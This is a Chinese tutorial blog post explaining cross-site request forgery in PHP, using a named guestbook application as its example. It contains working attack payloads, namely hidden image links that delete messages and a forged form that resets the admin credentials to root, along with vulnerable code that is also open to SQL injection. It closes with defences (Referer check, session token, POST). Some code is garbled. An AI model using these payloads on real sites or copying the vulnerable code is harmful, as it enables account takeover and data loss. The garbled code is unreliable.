PHP漏洞全解(六)-跨网站请求伪造

最新推荐文章于 2021-03-24 10:27:43 发布
最新推荐文章于 2021-03-24 10:27:43 发布
阅读量227 收藏
点赞数
分类专栏: php 文章标签: php 安全

本文主要介绍针对PHP网站的跨网站请求伪造。在CSRF所有攻击方式中包含攻击者伪造一个看起来是其他用户发起的 HTTP 请求,事实上,跟踪一个用户发送的 HTTP 请求才是攻击者的目的。

CSRF(Cross Site Request Forgeries),意为跨网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞的网站,网站执行此请求后,引发跨站请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。

例如:某个购物网站购买商品时,采用http://www.shop.com/buy.php?item=watch&num=1,item参数确定要购买什么物品,num参数确定要购买数量,如果攻击者以隐藏的方式发送给目标用户链接

,那么如果目标用户不小心访问以后,购买的数量就成了1000个

实例

随缘网络PHP留言板V1.0

任意删除留言

//delbook.php 此页面用于删除留言

 
 
  1. 

  2. include_once("dlyz.php"); //dlyz.php用户验证权限,当权限是admin的时候方可删除留言 
  3. include_once("../conn.php"); 
  4. $del=$_GET["del"]; 
  5. $id=$_GET["id"]; 
  6. if ($del=="data"
  8.     $ID_Dele= implode(",",$_POST['adid']); 
  9.     $sql="delete from book where id in (".$ID_Dele.")"
  10.     mysql_query($sql); 
  12. else 
  14.     $sql="delete from book where id=".$id//传递要删除的留言ID 
  15.     mysql_query($sql); 
  17. mysql_close($conn); 
  18. echo ""
  19. echo "alert(‘删除成功!’);"
  20. echo " location=’book.php’;"
  21. echo ""
  22. ?> 

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言

利用方法:

我们使用普通用户留言(源代码方式),内容为

 
 
  1. "delbook.php?id=2" /> 
  2. "delbook.php?id=3" /> 
  3. "delbook.php?id=4" /> 
  4. "delbook.php?id=5" /> 

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了

现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。

攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了

修改管理员密码

 
 
  1. //pass.php 
  2. if($_GET["act"]) 
  4.     $username=$_POST["username"]; 
  5.     $sh=$_POST["sh"]; 
  6.     $gg=$_POST["gg"]; 
  7.     $title=$_POST["title"]; 
  8.     $copyright=$_POST["copyright"]."
设计制作:厦门随缘网络科技"
  9.     $password=md5($_POST["password"]); 
  10. if(emptyempty($_POST["password"])) 
  12.     $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
  14. else 
  16.     $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
  18. mysql_query($sql); 
  19. mysql_close($conn); 
  20. echo ""
  21. echo "alert(‘修改成功!’);"
  22. echo " location=’pass.php’;"
  23. echo ""

这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:

 
 
  1. <body> 
  2.     <form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1"> 
  3.     <input type="radio" value="1" name="sh"> 
  4.     <input type="radio" name="sh" checked value="0"> 
  5.     <input type="text" name="username" value="root"> 
  6.     <input type="password" name="password" value="root"> 
  7.     <input type="text" name="title" value="随缘网络PHP留言板V1.0(带审核功能)" > 
  8.     <textarea name="gg" rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!textarea> 
  9.     <textarea name="copyright" rows="6" cols="80" >随缘网络PHP留言本V1.0 版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名textarea> 
  10.     form> 
  11. body> 

存为attack.html,放到自己网站上http://www.sectop.com/attack.html,此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root

防范方法

防范CSRF要比防范其他攻击更加困难,因为CSRF的HTTP请求虽然是攻击者伪造的,但是却是由目标用户发出的,一般常见的防范方法有下面几种:

1、检查网页的来源

2、检查内置的隐藏变量

3、使用POST,不要使用GET

检查网页来源

在//pass.php头部加入以下红色字体代码,验证数据提交

 
 
  1. if($_GET["act"]) 
  3.     if(isset($_SERVER["HTTP_REFERER"])) 
  5.         $serverhost = $_SERVER["SERVER_NAME"]; 
  6.         $strurl = str_replace("http://","",$_SERVER["HTTP_REFERER"]); 
  7.         $strdomain = explode("/",$strurl); 
  8.         $sourcehost = $strdomain[0]; 
  9.     if(strncmp($sourcehost$serverhoststrlen($serverhost))) 
  10.     {
  11.         unset($_POST); 
  12.         echo ""
  13.         echo "alert(‘数据来源异常!’);"
  14.         echo " location=’index.php’;";
  15.         echo ""
  18.     $username=$_POST["username"]; 
  19.     $sh=$_POST["sh"]; 
  20.     $gg=$_POST["gg"]; 
  21.     $title=$_POST["title"]; 
  22.     $copyright=$_POST["copyright"]."
设计制作:厦门随缘网络科技"
  23.     $password=md5($_POST["password"]); 
  24.     if(emptyempty($_POST["password"])) 
  26.         $sql="update gly set username=’".$username."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
  28.     else 
  30.         $sql="update gly set username=’".$username."’,password=’".$password."’,sh=".$sh.",gg=’".$gg."’,title=’".$title."’,copyright=’".$copyright."’ where id=1"
  32. mysql_query($sql); 
  33. mysql_close($conn); 
  34. echo ""
  35. echo "alert(‘修改成功!’);"
  36. echo " location=’pass.php’;"
  37. echo ""

检查内置隐藏变量

我们在表单中内置一个隐藏变量和一个session变量,然后检查这个隐藏变量和session变量是否相等,以此来判断是否同一个网页所调用

 
 
  1. php 
  2. include_once("dlyz.php"); 
  3. include_once("../conn.php"); 
  4. if($_GET["act"]) 
  6. if (!isset($_SESSION["post_id"])) 
  8. // 生成唯一的ID,并使用MD5来加密 
  9. $post_id = md5(uniqid(rand(), true)); 
  10. // 创建Session变量 
  11. $_SESSION["post_id"] = $post_id; 
  13. // 检查是否相等 
  14. if (isset($_SESSION["post_id"])) 
  16. // 不相等 
  17. if ($_SESSION["post_id"] != $_POST["post_id"]) 
  19. // 清除POST变量 
  20. unset($_POST); 
  21. echo "<script language=’javascript’>"; 
  22. echo "alert(‘数据来源异常!’);"; 
  23. echo " location=’index.php’;"; 
  24. echo "script>"; 
  27. …… 
  28. <input type="reset" name="Submit2" value="重 置"> 
  29. <input type="hidden" name="post_id" value="php echo $_SESSION["post_id"];?>"> 
  30. td>tr> 
  31. table> 
  32. form> 
  33. php 
  35. mysql_close($conn); 
  36. ?> 
  37. body> 
  38. html> 

使用POST,不要使用GET

传递表单字段时,一定要是用POST,不要使用GET,处理变量也不要直接使用$_REQUEST

xiaoao89757
关注
专栏目录
PHP漏洞全解(一)-PHP网站安全性问题
qq122219685的专栏
05-18 709
针对PHP网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injection) 6、网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、S
PHP漏洞全解
07-26
PHP漏洞全解(一)-PHP网站安全性问题 PHP漏洞全解(二)-命令注入攻击 ...PHP漏洞全解()-网站请求伪造 PHP漏洞全解(七)-Session劫持 PHP漏洞全解(八)-HTTP响应拆分 PHP漏洞全解(九)-文件上传漏洞
php漏洞网站请求伪造与防止伪造方法
10-26
今天我来给大家介绍在php网站请求伪造的实现方法与最后我们些常用的防止伪造的具体操作方法,有需要了解的朋友可进入参考
PHP-漏洞之一】网站请求伪造
Chanson
04-25 532
攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞网站网站执行此请求后,引发请求伪造攻击。 攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达到攻击者的目的。 例如:某个购物网站购买商品时,采用http://www.taobao.com/gouma
网站请求伪造攻击
weixin_33828101的博客
04-11 180
2019独角兽企业重金招聘Python工程师标准>>> ...
PHP漏洞全解1-9
09-16
PHP 漏洞全解( 一)-PHP 网页的安全性问题 针对 PHP网站主要存在下面几种攻击...6、网站请求伪造攻击(Cross Site Request Forgeries, CSRF) 7、Session 会话劫持(Session Hijacking) 8、Session 固定攻击(Session
PHP漏洞全解(详细介绍)
10-27
6. 网站请求伪造攻击(CrossSiteRequestForgeries, CSRF) CSRF攻击利用了网站对用户请求的信任,攻击者诱使用户在已认证的会话中执行非预期的操作。防范CSRF的方法包括使用CSRF令牌,确保每个表单提交都包含一个...
php 模拟访问csrf,PHP中的CSRF(站点请求伪造)攻击示例和预防
weixin_36437103的博客
03-11 285
CSRF攻击中有3个玩家受害者的网站(在您的示例中为您的投票网站)[知道他已登录的用户cookie]客户的浏览器(登录时)[知道他的cookie]攻击者的网站[不知道登录用户的cookie]CSRF攻击取决于2个事实浏览器会根据每个请求自动发送cookie我们依靠cookie来标识我们的登录用户(例如:csrfSecret)如果攻击者可以轻易使他人或已登录的用户要求此操作// http://vic...
php伪造http头实现IP欺骗
07-19
可以伪造出http头,以达到修改请求来源的方法。
php 站点请求伪造,PHP 请求伪造及防护 (CSRF)【未完成】
weixin_39778447的博客
03-24 302
一、什么是 CSRF请求伪造(Cross-Site Request Forgery),通常缩写为 CSRF 或者 XSRF,是一种使已登录用户在不知情的情况下执行某种动作的攻击。二、CSRF请求过程CSRF在违反同源策略的情况下,攻击主要用来执行某种非法动作,而非窃取用户数据。例如,当受害者是一个普通用户时,CSRF可以实现在其不知情的情况下进行转移用户资金、发送邮件等操作。但是如果受害者是一...
网站请求伪造
You are happier than before
07-15 914
CSRF(Cross Site Request Forgeries),意为网站请求伪造,也有写为XSRF。攻击者伪造目标用户的HTTP请求,然后此请求发送到有CSRF漏洞网站网站执行此请 求后,引发请求伪造攻击。攻击者利用隐蔽的HTTP连接,让目标用户在不注意的情况下单击这个链接,由于是用户自己点击的,而他又是合法用户拥有合法 权限,所以目标用户能够在网站内执行特定的HTTP链接,从而达...
php防止伪造请求的小招式
红尘道,红尘练心
05-29 157
 伪造请求介绍   伪造请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:   伪造链接,引诱用户点击,或是让用户在不知情的情况下访问   伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。   比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变...
站点请求伪造解决方案
weixin_30897079的博客
07-28 367
站点请求伪造解决方案 AppScan 站点请求伪造 Token 近期通过APPScan扫描程序,发现了不少安全问题,通过大量查阅和尝试最终还是解决掉了,于是整理了一下方便查阅。 前一篇博客介绍了启用了不安全的HTTP方法的解决方案,有兴趣请移步http://www.cnblogs.com/xlyslr/p/5707995.html。 1.站点请求伪造 首先,什么...
【代码】利用php防止用户伪造请求的小技巧
10-10 1714
清源教育php开发课程学习培训之php常用的伪造请求介绍 伪造请求比较难以防范,而且危险系数很大,恶意攻击者经常通过这种方式进行恶作剧,发spam信息,删除网站数据等等。这种常见的攻击表现形式有: 伪造恶意的链接,诱骗用户去点击,或者让用户在毫无防备的情况下访问 伪造提交表单,诱骗用户提交。表单是隐藏类型的,用图片或链接的形式伪装。 比较常见并且最常用的防范手段是在
php防止伪造数据从URL提交解决方法
weixin_33720956的博客
07-04 360
php防止伪造数据从URL提交解决方法php防止伪造的数据从URL提交方法。针对伪造的数据从URL提交的情况,首先是一个检查前一页来源的如下代码:<?/*PHP防止站外提交数据的方法*/functionCheckURL(){$servername=$_SERVER['SERVER_NAME']; $sub_from=$_SERVER["HTTP_REFERER"];...
IBM Security Appscan漏洞--链接注入(便于请求伪造
YouXu
03-16 4892
•可能会劝说初级用户提供诸如用户名、密码、信用卡号、社会保险号等敏感信息 •可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务 •可能会在 Web 服务器上上载、修改或删除 Web 页面、脚本和文件
PHP安全漏洞详解:从注入到伪造请求
"该资源为'PHP漏洞全解'的PDF文档,主要涵盖了16种针对PHP网站的常见攻击方式,包括命令注入、eval注入、客户端脚本攻击、XSS攻击、SQL注入、CSRF攻击、Session劫持、Session固定、HTTP响应拆分、文件上传漏洞、目录...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值